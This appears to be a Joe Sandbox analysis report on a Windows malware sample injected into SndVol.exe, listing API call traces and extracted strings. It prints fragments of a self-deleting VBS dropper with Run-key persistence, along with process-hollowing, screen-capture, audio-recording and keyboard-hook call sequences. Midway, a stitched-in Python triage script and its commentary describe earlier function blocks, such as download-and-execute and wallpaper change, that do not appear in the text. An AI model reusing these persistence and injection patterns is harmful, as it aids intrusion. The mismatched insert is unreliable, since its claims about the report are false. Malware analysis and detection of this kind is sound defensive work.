                                                                        • API String ID: 4212172061-0
                                                                        • Opcode ID: d08ef3629d79f3196150600a6de86323e263b58a6d5adbb9185000ea6ad77bcc
                                                                        • Instruction ID: c5e71a7694c2fea4d4b1056348f105da09659df88a1143baee9b063dd56d0078
                                                                        • Opcode Fuzzy Hash: d08ef3629d79f3196150600a6de86323e263b58a6d5adbb9185000ea6ad77bcc
                                                                        • Instruction Fuzzy Hash: A5610973A00606AAF7199B76CC85BF673A8FF05358F10456AEA05D7180EB70EB46DF60
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 2916BC69
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 2916BC73
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 2916BC80
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: e9f50357e60613d0d8f2085f89551383506461181c71d9ad069b781c0d703358
                                                                        • Instruction ID: b1df93486746c93d756e79291e3c83d03fa7ba81f4e824decb05653bf85cc499
                                                                        • Opcode Fuzzy Hash: e9f50357e60613d0d8f2085f89551383506461181c71d9ad069b781c0d703358
                                                                        • Instruction Fuzzy Hash: B831E474D4121CABCB21DF25D9887CDB7B8BF18310F1041EAE81CA62A0EB709B918F44
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,?,2917332B,?), ref: 29173376
                                                                        • TerminateProcess.KERNEL32(00000000,?,2917332B,?), ref: 2917337D
                                                                        • ExitProcess.KERNEL32 ref: 2917338F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: 037eee12565ca4f58f5c738f69a80b82af008256231fbe765418b464e0960a96
                                                                        • Instruction ID: 3353e111d3aa08eb34c5a38e49312b30d95cdd9dfa42fd5390513d7bbafb8e39
                                                                        • Opcode Fuzzy Hash: 037eee12565ca4f58f5c738f69a80b82af008256231fbe765418b464e0960a96
                                                                        • Instruction Fuzzy Hash: F9E04F3164024AEBCF556F16EE0CAC83B7AFF00355F004014F8054B121CB39DA43DBA0
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,2916490B), ref: 29164BDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 7469071c6ab269693bcda27afbecec6434787bf22f7cade7071649835077bc62
                                                                        • Instruction ID: 30060df6a62f29462b952bbf027fc564efa53f475d8bacf1b4092b8d4b1b9dec
                                                                        • Opcode Fuzzy Hash: 7469071c6ab269693bcda27afbecec6434787bf22f7cade7071649835077bc62
                                                                        • Instruction Fuzzy Hash:
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PkGNG
                                                                        • API String ID: 0-263838557
                                                                        • Opcode ID: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                        • Instruction ID: 43807a32d8d952758d492e4c2e703a4a5e4f6a7e28fc20eabd50c0a39835b7d7
                                                                        • Opcode Fuzzy Hash: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                        • Instruction Fuzzy Hash: 53E0B631000258FFCF11AF55DD48A493BAAEB41256F404869F9069A2A3CB35ED82CB99
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 94cd58e0bdbbcaa00c6fa765c8bce8b5473b2a69a10935b5f588d9862963529e
                                                                        • Instruction ID: 58c1c3252b3cdea570e7dfbab7ebf259c326fb4903373f4ba722b44392a55b43
                                                                        • Opcode Fuzzy Hash: 94cd58e0bdbbcaa00c6fa765c8bce8b5473b2a69a10935b5f588d9862963529e
                                                                        • Instruction Fuzzy Hash: 11A01130300288CBAB00AE33AA0820E3AAEBA00280300C028A002C0A08EB288800AF02
                                                                        APIs
                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 29148ECB
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 29148ED8
                                                                          • Part of subcall function 29149360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 29149390
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 29148F4E
                                                                        • DeleteDC.GDI32(00000000), ref: 29148F65
                                                                        • DeleteDC.GDI32(00000000), ref: 29148F68
                                                                        • DeleteObject.GDI32(00000000), ref: 29148F6B
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 29148F8C
                                                                        • DeleteDC.GDI32(00000000), ref: 29148F9D
                                                                        • DeleteDC.GDI32(00000000), ref: 29148FA0
                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 29148FC4
                                                                        • GetIconInfo.USER32(?,?), ref: 29148FF8
                                                                        • DeleteObject.GDI32(?), ref: 29149027
                                                                        • DeleteObject.GDI32(?), ref: 29149034
                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 29149041
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 29149077
                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 291490A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 29149110
                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 2914917F
                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 291491A3
                                                                        • DeleteDC.GDI32(?), ref: 291491B7
                                                                        • DeleteDC.GDI32(00000000), ref: 291491BA
                                                                        • DeleteObject.GDI32(00000000), ref: 291491BD
                                                                        • GlobalFree.KERNEL32(?), ref: 291491C8
                                                                        • DeleteObject.GDI32(00000000), ref: 2914927C
                                                                        • GlobalFree.KERNEL32(?), ref: 29149283
                                                                        • DeleteDC.GDI32(?), ref: 29149293
                                                                        • DeleteDC.GDI32(00000000), ref: 2914929E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                        • String ID: DISPLAY
                                                                        • API String ID: 479521175-865373369
                                                                        • Opcode ID: c0e8ae200bb3bdeddafc4c943b3c240fb7369706611e6a4f752652ba93fade76
                                                                        • Instruction ID: 1e8bad6c8d0274c2e39f698b070fbf7bf8adbbe4973de9a69fe4ed1fa576069f
                                                                        • Opcode Fuzzy Hash: c0e8ae200bb3bdeddafc4c943b3c240fb7369706611e6a4f752652ba93fade76
                                                                        • Instruction Fuzzy Hash: B4C15D71A08344AFE314DF22D848B6BBBE9FF88754F40491DF58A97254DB34AA05CB62
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 29148171
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29148174
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 29148185
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29148188
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 29148199
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914819C
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 291481AD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291481B0
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 29148252
                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 2914826A
                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 29148280
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 291482A6
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 29148328
                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 2914833C
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 2914837C
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 29148446
                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 29148463
                                                                        • ResumeThread.KERNEL32(?), ref: 29148470
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 29148487
                                                                        • GetCurrentProcess.KERNEL32(?), ref: 29148492
                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 291484AD
                                                                        • GetLastError.KERNEL32 ref: 291484B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                        • API String ID: 4188446516-3035715614
                                                                        • Opcode ID: 3e872735ee9ecbaeeeb0b596736126d0e54e2d2a5d91b0d80d0246da46222fe2
                                                                        • Instruction ID: caff235fc00146f21e67bf4b0390a5d73a5a9129fe12210a39aa9670449516b2
                                                                        • Opcode Fuzzy Hash: 3e872735ee9ecbaeeeb0b596736126d0e54e2d2a5d91b0d80d0246da46222fe2
                                                                        • Instruction Fuzzy Hash: 99A190B0A04345AFE715DF62CC89F6A7BE9FF48348F001829F685D6191D778DA05CB61
                                                                        APIs
                                                                          • Part of subcall function 2914288B: TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                          • Part of subcall function 2914288B: WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 2913D558
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 2913D56B
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 2913D584
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 2913D5B4
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2B8,00000000,291A52F0,pth_unenc,2913D0F3,291A52D8,291A52F0,?,pth_unenc), ref: 2913B8F6
                                                                          • Part of subcall function 2913B8E7: UnhookWindowsHookEx.USER32(291A50F0), ref: 2913B902
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2A2,00000000,?,pth_unenc), ref: 2913B910
                                                                          • Part of subcall function 2914C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,29196478,00000000,00000000,2913D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 2914C4C1
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000000), ref: 2913D7FF
                                                                        • ExitProcess.KERNEL32 ref: 2913D80B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                        • API String ID: 1861856835-1536747724
                                                                        • Opcode ID: 67203c14d440d06ea0224849ded419f72c96fe79e2b5ac45767c05337b0c0d78
                                                                        • Instruction ID: 6e3d35253ad1f9f5bc268879b73edc9da65ebdefe8698aaccfaf0620477f8f9b
                                                                        • Opcode Fuzzy Hash: 67203c14d440d06ea0224849ded419f72c96fe79e2b5ac45767c05337b0c0d78
                                                                        • Instruction Fuzzy Hash: B49165316042407AE358E723DC909AF77BD6FA525CFD0982DA44A93194EF20AF4FC65A
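The function blocks above describe four behaviours in the same trace format: the ShellExecuteW plus URLDownloadToFileW pair (download-and-execute), SystemParametersInfoW with uiAction 0x14 beside the Control Panel\Desktop registry strings (wallpaper change), the CreateProcessW(..., 0x4, ...) / GetThreadContext / WriteProcessMemory / SetThreadContext / ResumeThread sequence (process hollowing into a suspended child), and the update.vbs strings with a CurrentVersion\Run path (self-deleting VBS with Run-key persistence). The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses these per-function `APIs` and `String ID` lines and flags those patterns. CREATE_SUSPENDED = 0x4 and SPI_SETDESKWALLPAPER = 0x14 are the standard Win32 values; the rule names, the argument positions they test, and the trimmed sample text embedded at the bottom (taken from the blocks on this page) are this example's own choices.

```python
"""Behavioural triage over Joe Sandbox per-function API traces.

Added example, not part of this report or of the analysed sample: parse the
'APIs' / 'String ID' lines of a function block and flag the call patterns the
report attributes to this sample. Rule names and argument positions are this
example's own choices.
"""
import re
from dataclasses import dataclass, field

# One API line, e.g. '• CreateProcessW.KERNEL32(00000000,?,...), ref: 29148252',
# with optional 'Part of subcall function XXXX:' prefix and optional argument list.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*?)\s*$")
FUZZY_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*(?P<h>[0-9A-Fa-f]*)\s*$")

CREATE_SUSPENDED = "00000004"      # dwCreationFlags: 6th argument of CreateProcessW
SPI_SETDESKWALLPAPER = "00000014"  # uiAction: 1st argument of SystemParametersInfoW


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    subcall: str = ""  # caller shown as 'Part of subcall function', if any


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # 'String ID' entries, split on '$'
    fuzzy: str = ""                              # Instruction Fuzzy Hash closes a block

    def has(self, api, pred=lambda args: True):
        return any(c.api == api and pred(c.args) for c in self.calls)

    def in_order(self, *apis):
        """True if the APIs occur as a subsequence in listed (address) order."""
        it = iter(c.api for c in self.calls)
        return all(api in it for api in apis)


def parse_blocks(text):
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"] or ""))
        elif m := STRING_RE.match(line):
            cur.strings = [s for s in m["s"].split("$") if s]
        elif m := FUZZY_RE.match(line):
            cur.fuzzy = m["h"]
            blocks.append(cur)
            cur = FunctionBlock()
    if cur.calls or cur.strings:  # trailing block without a fuzzy-hash line
        blocks.append(cur)
    return blocks


def assess(block):
    """Return the behaviour labels whose rule the block satisfies."""
    found = []
    if (block.has("CreateProcessW", lambda a: len(a) > 5 and a[5] == CREATE_SUSPENDED)
            and block.in_order("GetThreadContext", "WriteProcessMemory",
                               "SetThreadContext", "ResumeThread")):
        found.append("process hollowing (suspended child, context swap, resume)")
    if block.has("URLDownloadToFileW") and block.has("ShellExecuteW"):
        found.append("download-and-execute")
    if block.has("SystemParametersInfoW", lambda a: bool(a) and a[0] == SPI_SETDESKWALLPAPER):
        found.append("desktop wallpaper change")
    joined = "\n".join(block.strings)
    if "Wscript.ScriptFullName" in joined and "CurrentVersion\\Run" in joined:
        found.append("self-deleting VBS with Run-key persistence")
    return found


def triage(text):
    """Map each block's instruction fuzzy hash to the behaviours it matches."""
    return {b.fuzzy: f for b in parse_blocks(text) if (f := assess(b))}


# Constructed sample: four function blocks from this report, trimmed to the
# lines the rules read. Backslashes are doubled for the Python literal only.
SAMPLE = """\
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 29136FF7
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 291370DB
• String ID: C:\\Windows\\SysWOW64\\SndVol.exe$open
• Instruction Fuzzy Hash: 08610932A1420077EB58EA77CC95DAE37B95FE155CFC0982CE442571C4EE209B0BC3AA
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 2914CB68
  • Part of subcall function 291437AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 291437B9
• String ID: Control Panel\\Desktop$TileWallpaper$WallpaperStyle
• Instruction Fuzzy Hash: 9511A462F9014073F848313B5D56F9D381283966EDFC2A518E6072A6C9D4834B1303E6
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 29148252
• GetThreadContext.KERNEL32(?,00000000), ref: 29148280
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 29148446
• SetThreadContext.KERNEL32(?,00000000), ref: 29148463
• ResumeThread.KERNEL32(?), ref: 29148470
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• Instruction Fuzzy Hash: 99A190B0A04345AFE715DF62CC89F6A7BE9FF48348F001829F685D6191D778DA05CB61
APIs
  • Part of subcall function 2914C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,29196478,00000000,00000000,2913D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 2914C4C1
• ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000000), ref: 2913D7FF
• String ID: Set fso = CreateObject("Scripting.FileSystemObject")$Software\\Microsoft\\Windows\\CurrentVersion\\Run\\$\\update.vbs$fso.DeleteFile(Wscript.ScriptFullName)
• Instruction Fuzzy Hash: B49165316042407AE358E723DC909AF77BD6FA525CFD0982DA44A93194EF20AF4FC65A
"""

if __name__ == "__main__":
    for fuzzy, found in triage(SAMPLE).items():
        print(fuzzy[:16], "->", "; ".join(found))
```

The hollowing rule deliberately requires listing order: a function that merely imports GetThreadContext and WriteProcessMemory (a debugger, a crash handler) should not trip it, while the report's own listing for this function shows the suspended CreateProcessW followed by the context read, the memory write, the context swap and the resume, which is the sequence worth alerting on. Run it over the full function listing of a report rather than this trimmed sample to see which other blocks share the same fuzzy hash.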
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,291A50E4,00000003), ref: 291424CF
                                                                        • ExitProcess.KERNEL32(00000000), ref: 291424DB
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 29142555
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 29142564
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2914256F
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29142576
                                                                        • GetCurrentProcessId.KERNEL32 ref: 2914257C
                                                                        • PathFileExistsW.SHLWAPI(?), ref: 291425AD
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 29142610
                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 2914262A
                                                                        • lstrcatW.KERNEL32(?,.exe), ref: 2914263C
                                                                          • Part of subcall function 2914C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,29196478,00000000,00000000,2913D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 2914C4C1
                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 2914267C
                                                                        • Sleep.KERNEL32(000001F4), ref: 291426BD
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 291426D2
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 291426DD
                                                                        • CloseHandle.KERNEL32(00000000), ref: 291426E4
                                                                        • GetCurrentProcessId.KERNEL32 ref: 291426EA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                        • String ID: .exe$WDH$exepath$open$temp_
                                                                        • API String ID: 2649220323-3088914985
                                                                        APIs
                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 2914B1CD
                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 2914B1E1
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,291960B4), ref: 2914B209
                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,291A4EE0,00000000), ref: 2914B21F
                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 2914B260
                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 2914B278
                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 2914B28D
                                                                        • SetEvent.KERNEL32 ref: 2914B2AA
                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 2914B2BB
                                                                        • CloseHandle.KERNEL32 ref: 2914B2CB
                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 2914B2ED
                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 2914B2F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                        • API String ID: 738084811-1354618412
                                                                        APIs
                                                                          • Part of subcall function 2914288B: TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                          • Part of subcall function 2914288B: WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,291A52F0,?,pth_unenc), ref: 2913D1E0
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 2913D1F3
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,291A52F0,?,pth_unenc), ref: 2913D223
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,291A52F0,?,pth_unenc), ref: 2913D232
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2B8,00000000,291A52F0,pth_unenc,2913D0F3,291A52D8,291A52F0,?,pth_unenc), ref: 2913B8F6
                                                                          • Part of subcall function 2913B8E7: UnhookWindowsHookEx.USER32(291A50F0), ref: 2913B902
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2A2,00000000,?,pth_unenc), ref: 2913B910
                                                                          • Part of subcall function 2914BA09: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,29196478,2913D248,.vbs,?,?,?,?,?,291A52F0), ref: 2914BA30
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000000), ref: 2913D44D
                                                                        • ExitProcess.KERNEL32 ref: 2913D454
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                        • API String ID: 3797177996-3018399277
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 29131AD9
                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 29131B03
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 29131B13
                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 29131B23
                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 29131B33
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 29131B43
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 29131B54
                                                                        • WriteFile.KERNEL32(00000000,291A2AAA,00000002,00000000,00000000), ref: 29131B65
                                                                        • WriteFile.KERNEL32(00000000,291A2AAC,00000004,00000000,00000000), ref: 29131B75
                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 29131B85
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 29131B96
                                                                        • WriteFile.KERNEL32(00000000,291A2AB6,00000002,00000000,00000000), ref: 29131BA7
                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 29131BB7
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 29131BC7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Similarity
                                                                        • API ID: File$Write$Create
                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                        • API String ID: 1602526932-4212202414
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\SndVol.exe,00000001,29137688,C:\Windows\SysWOW64\SndVol.exe,00000003,291376B0,291A52D8,29137709), ref: 291372BF
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291372C8
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 291372DD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291372E0
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 291372F1
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291372F4
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 29137305
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29137308
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 29137319
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2913731C
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 2913732D
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29137330
                                                                        Memory Dump Source
